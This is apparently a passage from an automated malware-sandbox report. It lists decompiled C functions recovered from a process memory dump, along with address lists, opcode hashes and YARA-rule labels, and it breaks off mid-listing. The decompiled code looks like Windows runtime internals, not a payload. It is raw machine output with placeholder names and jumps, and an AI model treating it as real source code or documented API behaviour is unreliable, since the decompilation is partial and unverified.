                                      0x0540fee7
                                      0x0540fed7
                                      0x0540fee0
                                      0x0540fee0
                                      0x0540feef
                                      0x0540ff00
                                      0x0540ff02
                                      0x0540ff07
                                      0x0540ff07
                                      0x00000000
                                      0x0540feef
                                      0x0540fe33
                                      0x0540fe55
                                      0x0540fe59
                                      0x0540fe5b
                                      0x0540fe5e
                                      0x0540fe69
                                      0x0540fe6d
                                      0x0540fe6d
                                      0x0540fe69
                                      0x0540fe35
                                      0x0540fe41
                                      0x0540fe41
                                      0x0540fe79
                                      0x0540fe8b
                                      0x0540fe7b
                                      0x0540fe84
                                      0x0540fe84
                                      0x0540fe93
                                      0x00000000
                                      0x0540fea8
                                      0x0540feba
                                      0x00000000
                                      0x0540feba
                                      0x0540fdfe
                                      0x0540fe01
                                      0x0540fe02
                                      0x0540fe08
                                      0x0540ff0c
                                      0x0540ff14
                                      0x0540ff14

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                      • Instruction ID: dea82e3e6cea6152d7708ab21f9622e75bea6e767e5623a287e464a00b98afa0
                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                      • Instruction Fuzzy Hash: 1431F5323046407FD332D769C848FAB77A6FB85240F2865BBE9468B385DA74D846C750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0540EA55, Relevance: .1, Instructions: 111COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 70%
                                      			E0540EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E05362280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0540E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0534F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0535FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0540AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0540BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E05367D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E053FFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0535FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0540A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                      0x0540ea55
                                      0x0540ea66
                                      0x0540ea68
                                      0x0540ea6c
                                      0x0540ea6f
                                      0x0540ea72
                                      0x0540ea75
                                      0x0540ea7a
                                      0x0540ea7a
                                      0x0540ea7e
                                      0x0540ea80
                                      0x0540ea85
                                      0x0540ea8b
                                      0x0540eab5
                                      0x0540eabc
                                      0x0540eabf
                                      0x0540eabf
                                      0x0540eaca
                                      0x0540eace
                                      0x0540ead0
                                      0x0540eae4
                                      0x0540eaeb
                                      0x0540eaf0
                                      0x0540eaf5
                                      0x0540eb09
                                      0x0540eb0d
                                      0x0540eb1d
                                      0x0540eb2d
                                      0x0540eb38
                                      0x0540eb3d
                                      0x0540eb41
                                      0x0540eb4a
                                      0x0540eb60
                                      0x0540eb4c
                                      0x0540eb52
                                      0x0540eb59
                                      0x0540eb59
                                      0x0540eb68
                                      0x0540eb71
                                      0x0540eb71
                                      0x0540ea8d
                                      0x0540ea8f
                                      0x0540ea92
                                      0x0540ea97
                                      0x0540ea97
                                      0x0540ea9b
                                      0x0540ea9c
                                      0x0540ea9e
                                      0x0540eaa6
                                      0x0540eaa6
                                      0x0540eb7e

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                      • Instruction ID: c150e42117e0fe9e768fa00e0cc09e9bc7e6303c220651537df98ff2d0a63fdc
                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                      • Instruction Fuzzy Hash: 2C31D4727047059BC719DF25C884EABB7AAFBC4210F14593EF95287784DE34E829CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C69A6, Relevance: .1, Instructions: 108COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 69%
                                      			E053C69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x543d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L05356C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E053C6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E05389980() >= 0) {
							E05362280(_t56, 0x5438778);
							_t77 = 1;
							_t68 = 1;
							if( *0x5438774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x5438774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0534B6F0(0x532c338, 0x532c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E05389520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E053895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0535FFB0(_t68, _t77, 0x5438778);
				}
				_pop(_t78);
				return E0538B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                      0x053c69b5
                                      0x053c69be
                                      0x053c69c3
                                      0x053c69c9
                                      0x053c69cc
                                      0x053c69d1
                                      0x053c69d3
                                      0x053c69de
                                      0x053c69e1
                                      0x053c69ea
                                      0x053c69f6
                                      0x053c69fe
                                      0x053c6a13
                                      0x053c6a14
                                      0x053c6a15
                                      0x053c6a16
                                      0x053c6a1e
                                      0x053c6a26
                                      0x053c6a31
                                      0x053c6a36
                                      0x053c6a37
                                      0x053c6a40
                                      0x053c6a49
                                      0x053c6a4a
                                      0x053c6a53
                                      0x053c6a59
                                      0x053c6a5d
                                      0x053c6a5e
                                      0x053c6a64
                                      0x053c6a67
                                      0x053c6a6a
                                      0x053c6a6d
                                      0x053c6a70
                                      0x053c6a77
                                      0x053c6a7d
                                      0x053c6a86
                                      0x053c6a89
                                      0x053c6a9c
                                      0x053c6a9f
                                      0x053c6aa2
                                      0x053c6aa5
                                      0x053c6aaf
                                      0x053c6ab1
                                      0x053c6ab8
                                      0x053c6ab9
                                      0x053c6abb
                                      0x053c6abe
                                      0x053c6ac5
                                      0x053c6ac5
                                      0x053c6aaf
                                      0x053c6a40
                                      0x053c6a26
                                      0x053c69fe
                                      0x053c6ace
                                      0x053c6ad0
                                      0x053c6ad3
                                      0x053c6ad8
                                      0x053c6adf
                                      0x053c6adf
                                      0x053c6ae8
                                      0x053c6aef
                                      0x053c6aef
                                      0x053c6af9
                                      0x053c6b06

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1f041f525043fe367e11710aab9a2d524b016d058fffd11fcbf3b2e39ee0a7e5
                                      • Instruction ID: aabe3f952b6322d4631fec5d6be2babcfe18d427b614a0e10bd0f0162aad58f7
                                      • Opcode Fuzzy Hash: 1f041f525043fe367e11710aab9a2d524b016d058fffd11fcbf3b2e39ee0a7e5
                                      • Instruction Fuzzy Hash: F94197B1E01208AFDB24DFA8C842BFEBBF8FF48314F14816AE915A7250DB719905CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05345210, Relevance: .1, Instructions: 107COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E05345210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E053452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E053895D0();
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0535EB70(_t54, 0x54379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E053895D0();
								L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0535EB70(_t54, 0x54379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0538F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0535EB70(_t54, 0x54379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E053895D0();
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                      0x05345220
                                      0x05345224
                                      0x053a0d13
                                      0x053a0d16
                                      0x053a0d19
                                      0x0534522a
                                      0x0534522a
                                      0x0534522d
                                      0x0534522d
                                      0x05345231
                                      0x05345235
                                      0x05345239
                                      0x053a0d5c
                                      0x053a0d62
                                      0x00000000
                                      0x00000000
                                      0x053a0d6a
                                      0x053a0d7b
                                      0x053a0d7f
                                      0x053a0d81
                                      0x053a0d84
                                      0x053a0d95
                                      0x053a0d95
                                      0x053a0d6c
                                      0x053a0d71
                                      0x053a0d71
                                      0x053a0d9a
                                      0x00000000
                                      0x0534524a
                                      0x0534524a
                                      0x05345250
                                      0x053a0d24
                                      0x053a0d35
                                      0x053a0d39
                                      0x053a0d3b
                                      0x053a0d3e
                                      0x053a0d50
                                      0x053a0d50
                                      0x053a0d26
                                      0x053a0d2b
                                      0x053a0d2b
                                      0x00000000
                                      0x053a0d55
                                      0x05345256
                                      0x0534525b
                                      0x05345265
                                      0x053a0da7
                                      0x0534526b
                                      0x0534526e
                                      0x05345272
                                      0x053a0db1
                                      0x053a0db4
                                      0x053a0dc5
                                      0x053a0dc5
                                      0x05345272
                                      0x05345278
                                      0x0534527e
                                      0x0534528a
                                      0x0534528c
                                      0x0534528d
                                      0x00000000
                                      0x05345280
                                      0x05345282
                                      0x05345288
                                      0x0534529f
                                      0x05345292
                                      0x00000000
                                      0x05345292
                                      0x00000000
                                      0x05345288
                                      0x0534527e

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fd0e60cca95ef0287bcba8d05f1396ef3d9ac0814d708a9c4e879f7aa2af329
                                      • Instruction ID: a7d421bf881ae3e1b766cb67eac840c19533718154c855183731dd3c10d50cee
                                      • Opcode Fuzzy Hash: 0fd0e60cca95ef0287bcba8d05f1396ef3d9ac0814d708a9c4e879f7aa2af329
                                      • Instruction Fuzzy Hash: 1331FB33755741EBC729EF28C849F7677AAFF10760F11462AE8565B9A0EB70F900CA90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05383D43, Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E05383D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E05357B60(0, _t61, 0x53211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E05357B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L05364620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                      0x05383d4c
                                      0x05383d50
                                      0x05383d55
                                      0x05383d5e
                                      0x053be79a
                                      0x00000000
                                      0x053be79a
                                      0x05383d68
                                      0x053be789
                                      0x05383d9d
                                      0x05383da3
                                      0x05383daf
                                      0x05383db5
                                      0x05383dbc
                                      0x05383dc4
                                      0x05383dc9
                                      0x05383dce
                                      0x053be7ae
                                      0x053be7ae
                                      0x05383dde
                                      0x05383de2
                                      0x05383de7
                                      0x05383e0d
                                      0x05383e13
                                      0x05383e16
                                      0x05383e1e
                                      0x05383e25
                                      0x05383e28
                                      0x00000000
                                      0x00000000
                                      0x05383e2a
                                      0x05383e2f
                                      0x05383e37
                                      0x05383e37
                                      0x00000000
                                      0x05383e37
                                      0x05383e31
                                      0x00000000
                                      0x05383e31
                                      0x05383e20
                                      0x05383e20
                                      0x05383e35
                                      0x00000000
                                      0x05383de9
                                      0x05383de9
                                      0x05383de9
                                      0x05383dee
                                      0x05383dfd
                                      0x05383dff
                                      0x05383e02
                                      0x05383e05
                                      0x05383e05
                                      0x00000000
                                      0x05383df0
                                      0x05383de7
                                      0x053be78f
                                      0x053be794
                                      0x05383d79
                                      0x05383d84
                                      0x05383d89
                                      0x05383d8e
                                      0x00000000
                                      0x053be7a4
                                      0x05383d96
                                      0x05383d9a
                                      0x00000000
                                      0x05383d9a
                                      0x00000000
                                      0x053be794
                                      0x05383d6e
                                      0x05383d73
                                      0x00000000
                                      0x053be7b5
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e91609bb43a2d1849a6f55db3ae481df644d19a0de72830fe5e6e05195e7ded2
                                      • Instruction ID: 01fec846a2312d5938a6200ac9acbb3e03015f1c22eb7172b91c181f4b0f35ab
                                      • Opcode Fuzzy Hash: e91609bb43a2d1849a6f55db3ae481df644d19a0de72830fe5e6e05195e7ded2
                                      • Instruction Fuzzy Hash: 6331B232605614DBD728DF2DD852A7BBBEAFF45B10705886AE846CB750E7B0D840C791
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537A61C, Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E0537A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5420220);
				E0539D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x5437b9c; // 0x0
				_t55 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0539D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x5437b10 =  *0x5437b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x543536c; // 0x359df58
					if( *_t51 != 0x5435368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x5435368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x543536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0537A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                      0x0537a61c
                                      0x0537a61e
                                      0x0537a623
                                      0x0537a628
                                      0x0537a62b
                                      0x0537a62d
                                      0x0537a648
                                      0x0537a64a
                                      0x0537a64f
                                      0x053b9b44
                                      0x0537a6ec
                                      0x0537a6f1
                                      0x0537a6f1
                                      0x0537a655
                                      0x0537a657
                                      0x0537a65a
                                      0x0537a65d
                                      0x0537a662
                                      0x0537a663
                                      0x0537a667
                                      0x0537a668
                                      0x0537a66d
                                      0x0537a706
                                      0x0537a706
                                      0x053b9bda
                                      0x053b9be6
                                      0x053b9beb
                                      0x00000000
                                      0x053b9beb
                                      0x0537a679
                                      0x053b9b7a
                                      0x00000000
                                      0x053b9b7a
                                      0x0537a683
                                      0x0537a6f4
                                      0x0537a6f7
                                      0x0537a6f9
                                      0x0537a6fd
                                      0x0537a6a0
                                      0x0537a6a0
                                      0x0537a6ad
                                      0x0537a6af
                                      0x0537a6b4
                                      0x053b9ba7
                                      0x053b9bac
                                      0x00000000
                                      0x00000000
                                      0x053b9bc6
                                      0x053b9bce
                                      0x053b9bd1
                                      0x053b9bd3
                                      0x053b9bd3
                                      0x00000000
                                      0x053b9bd1
                                      0x0537a6bd
                                      0x0537a6c3
                                      0x0537a6c6
                                      0x0537a6d2
                                      0x0537a701
                                      0x0537a704
                                      0x00000000
                                      0x0537a704
                                      0x0537a6d4
                                      0x0537a6d6
                                      0x0537a6d9
                                      0x0537a6db
                                      0x0537a6e1
                                      0x0537a6e6
                                      0x0537a6e8
                                      0x0537a6e8
                                      0x0537a6ea
                                      0x00000000
                                      0x0537a6ea
                                      0x0537a688
                                      0x0537a692
                                      0x0537a694
                                      0x0537a699
                                      0x00000000
                                      0x00000000
                                      0x0537a69d
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61806537543a524870bdfc244936c4d2d852022887bf3d7fb789e0aaf726632f
                                      • Instruction ID: da5f367a397a94cd141f58ab5f48a2778b267857c715e6e79751ec76405052db
                                      • Opcode Fuzzy Hash: 61806537543a524870bdfc244936c4d2d852022887bf3d7fb789e0aaf726632f
                                      • Instruction Fuzzy Hash: BB4179B5E14209DFDB19CF58C890BADBBF2FF49304F1580A9E905AB355C7B8A901CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0536C182, Relevance: .1, Instructions: 104COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0536C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E05367D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05418D34(_v8, _t80);
					}
					E05362280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0535FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05418833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0535FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0538B180();
						if(_a4 != 0) {
							E05362280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0536BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0536BB2D(_t16, _t15);
						E0536B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0535FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0535FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0535FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                      0x0536c18d
                                      0x0536c18f
                                      0x0536c191
                                      0x0536c19b
                                      0x0536c1a0
                                      0x0536c1d4
                                      0x0536c1de
                                      0x053b2d6e
                                      0x0536c1e4
                                      0x0536c1e4
                                      0x0536c1e4
                                      0x0536c1ec
                                      0x053b2d7d
                                      0x053b2d7d
                                      0x0536c1f3
                                      0x0536c1ff
                                      0x053b2d88
